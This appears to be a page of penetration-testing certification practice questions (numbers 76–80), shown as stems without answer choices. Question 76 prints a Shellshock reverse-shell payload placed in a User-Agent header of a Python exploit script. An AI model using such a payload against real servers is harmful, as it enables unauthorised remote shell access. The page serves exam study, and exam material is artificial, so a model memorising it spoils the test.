Question 76

A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:
exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
Which of the following edits should the tester make to the script to determine the user context in which the server is being run?
  • Question 77

    Running a vulnerability scanner on a hybrid network segment that includes general IT servers and industrial control systems:
  • Question 78

    A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running. Which of the following would BEST support this task?
  • Question 79

    A penetration tester who is doing a security assessment discovers that a critical vulnerability is being actively exploited by cybercriminals. Which of the following should the tester do NEXT?
  • Question 80

    Penetration-testing activities have concluded, and the initial findings have been reviewed with the client.
    Which of the following best describes the NEXT step in the engagement?